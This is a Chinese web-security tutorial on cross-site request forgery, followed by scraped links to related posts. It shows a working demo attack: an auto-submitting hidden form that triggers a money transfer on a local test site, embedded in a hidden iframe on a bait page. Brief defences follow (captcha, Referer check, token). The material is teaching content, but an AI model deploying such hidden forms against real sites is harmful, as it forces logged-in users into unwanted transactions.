跨站请求伪造(Cross-site request forgery)是一种冒充受信任用户,向服务器发送非预期请求的攻击方式。

攻击的前提是: 用户已经登录过某网站。

攻击者通过一些诱惑性的标题,诱惑用户点击,结果被“钓鱼”,造成一些恶劣的后果,如金钱丢失等。

代码参考:https://github.com/lyraLe/XSS

示例:

如果在本地(127.0.0.1)3000端口,有个用户登录转账网站。通过抓包等分析出转账接口需要传递用户名和金额。

这个时候可以通过在任何一个网站中嵌入下面的代码。

    <form name="fished" method="post" action="http://127.0.0.1:3000/api/transfer">

        <input value="zfpx" name="target" />

        <input value="100" name="balance" />

    </form>

⚠️: localhost 和 127.0.0.1不是一回事。而且表态提交不存在跨域问题。域名相同,端口不同时,共享cookie。

然后在控制台中输入

document.fished.submit()

则会直接实现转账成功。

因为上面的方式会出现页面跳转到结果的现象。所以,一般钓鱼网站会将一个表单提交的iframe嵌入到一个钓鱼网站中。

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>钓鱼网站</title>

</head>

<body>

    <h2>游戏礼包大放送,查看有哪些内容</h2>

    <h3>该网站由fishServer启动,访问的端口是3001</h3>

    <p>

        这是一个钓鱼网站。顾名思义,就是这个网站上可以钓鱼,钓鱼就需要鱼饵,鱼饵就是被钓的人<br/>

        感兴趣的图片或者标题和内容。比如美女图片~~~,<br/>

        钓鱼网站的危险藏在水下。也就是网站内部隐藏的嵌入网站等。

    </p>

    <iframe style="display: none" src="./bad.html"></iframe>

    <script src="/node_modules/jquery/dist/jquery.js"></script>

</body>

</html>
<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <title>恶意网站</title>

</head>

<body>

    <form name="fished" method="post" action="http://127.0.0.1:3000/api/transfer">

        <input value="zfpx" name="target" />

        <input value="100" name="balance" />

    </form>

    <script>

        document.fished.submit();

    </script>

</body>

</html>

⚠️: 如果用户登录过本地的网站。在嵌入表单提交的第三方网站本质上拿不到cookie,在提交的时候会自动携带cookie。

如何避免上面的情况发生?

1. 验证码(可通过svg-captcha模拟)--登录后操作某些功能要求输入验证码

该方法用于减少并发量比较多,如12306(登录前就输入验证码)。用于避免CSRF攻击的化,用户体验不好。

实现方式:

钓鱼网站获取不到验证码。只有登录用户看得到。

2. 通过识别来源(请求头中的Referer)--如果Referer和接口的域名端口等不一致,说明被攻击

该方法不靠谱,因为可以通过node等方法伪造请求。

实现方式:

在后端接口接受请求的地方判断req.referer.includes('http://localhost:3000')。括号内是当前的域名和接口。

3. token -- 前后端约定一个令牌

类似验证码。但是不需要用户输入。他通过(cookie+标志)或者其他规则来生成一个token。

实现方法:

前端通过发送token,后端验证token.

CSRF(跨站请求伪造)的更多相关文章

  1. python CSRF跨站请求伪造

    python CSRF跨站请求伪造 <!DOCTYPE html> <html lang="en"> <head> <meta chars ...

  2. Django之CSRF跨站请求伪造(老掉牙的钓鱼网站模拟)

    首先这是一个测试的代码 请先在setting页面进行下面操作 注释完成后,开始模拟钓鱼网站的跨站请求伪造操作: 前端代码: <!DOCTYPE html> <html lang=&q ...

  3. ajax向Django前后端提交请求和CSRF跨站请求伪造

    1.ajax登录示例 urls.py from django.conf.urls import url from django.contrib import admin from app01 impo ...

  4. python 全栈开发,Day87(ajax登录示例,CSRF跨站请求伪造,Django的中间件,自定义分页)

    一.ajax登录示例 新建项目login_ajax 修改urls.py,增加路径 from app01 import views urlpatterns = [ path('admin/', admi ...

  5. 第三百一十五节,Django框架,CSRF跨站请求伪造

    第三百一十五节,Django框架,CSRF跨站请求伪造  全局CSRF 如果要启用防止CSRF跨站请求伪造,就需要在中间件开启CSRF #中间件 MIDDLEWARE = [ 'django.midd ...

  6. Django中的CSRF(跨站请求伪造)

    Django中的CSRF(跨站请求伪造) Django CSRF  什么是CSFR 即跨站请求伪装,就是通常所说的钓鱼网站. 钓鱼网站的页面和正经网站的页面对浏览器来说有什么区别? (页面是怎么来的? ...

  7. Django框架 之 基于Ajax中csrf跨站请求伪造

    Django框架 之 基于Ajax中csrf跨站请求伪造 ajax中csrf跨站请求伪造 方式一 1 2 3 $.ajaxSetup({     data: {csrfmiddlewaretoken: ...

  8. 十三 Django框架,CSRF跨站请求伪造

     全局CSRF 如果要启用防止CSRF跨站请求伪造,就需要在中间件开启CSRF #中间件 MIDDLEWARE = [ 'django.middleware.security.SecurityMidd ...

  9. Web框架之Django_09 重要组件(Django中间件、csrf跨站请求伪造)

    摘要 Django中间件 csrf跨站请求伪造 一.Django中间件: 什么是中间件? 官方的说法:中间件是一个用来处理Django的请求和响应的框架级别的钩子.它是一个轻量.低级别的插件系统,用于 ...

  10. django上课笔记3-ORM补充-CSRF (跨站请求伪造)

    一.ORM补充 ORM操作三大难点: 正向操作反向操作连表 其它基本操作(包含F Q extra) 性能相关的操作 class UserInfo(models.Model): uid = models ...

随机推荐

  1. 第5章:Linux系统管理

    1.文件读写 1).Python内置的open函数 f = open('data.txt', 'w') f.write('hello, world') f.close() 2).避免文件句柄泄露 tr ...

  2. Python Socket套接字编程

    Python 的创始人为吉多·范罗苏姆(Guido van Rossum).1989年的圣诞节期间,吉多·范罗苏姆为了在阿姆斯特丹打发时间,决心开发一个新的脚本解释程序,作为ABC语言的一种继承.Py ...

  3. Django中ORM常用字段及字段参数

    Object Relational Mapping(ORM) ORM介绍 ORM概念 对象关系映射(Object Relational Mapping,简称ORM)模式是一种为了解决面向对象与关系数据 ...

  4. ACM-ICPC 2017北京

    J. Pangu and Stones 大意: 给定$n$堆石子, $(n\le 100)$, 每次操作任选连续的至少$L$堆至多$R$堆合并, 代价为合并石子的总数, 求合并为$1$堆的最少花费. ...

  5. MySQL 聚合函数与count()函数

    一.MySQL中的聚合函数 MySQL 5.7文档的章节:12.20.1 Aggregate (GROUP BY) Function “聚合/组合”函数(group (aggregate) funct ...

  6. 进程程序替换(自主实现shell)

    进程替换 替换进程所运行的程序 流程:将另一段代码加载到内存中,通过页表将原来进程的映射关系重新建立到新的程序在内存中的地址,相当于替换了进程所运行程序以及所要处理的数据 (替换了代码段,重新初始化数 ...

  7. Unity 用脚本给EventTrigger添加各种事件

    using System.Collections; using System.Collections.Generic; using UnityEngine; using UnityEngine.Eve ...

  8. 【css】display:flex和display:box有什么区别

    说法一: 注意:前者是flex 2012年的语法,也将是以后标准的语法,大部分浏览器已经实现了无前缀版本.后者是2009年的语法,已经过时,是需要加上对应前缀的.所以兼容性的代码,大致如下displa ...

  9. luogu P3750 [六省联考2017]分手是祝愿

    luogu loj 可以发现在最优策略中,每种操作最多只会做一次,并且操作的先后顺序并不会影响答案,所以考虑从后往前扫,碰到一个\(1\)就对这个位置\(i\)进行操作,这样的操作一定是最优策略.记最 ...

  10. java 使用POI导出百万级数据

    先看结果吧,这只是测试其中有很多因数影响了性能. 表总数为:7千多万,测试导出100万 表字段有17个字段 最终excel大小有60多兆 总耗时:126165毫秒 差不多2分多钟 其核心简单来说就是分 ...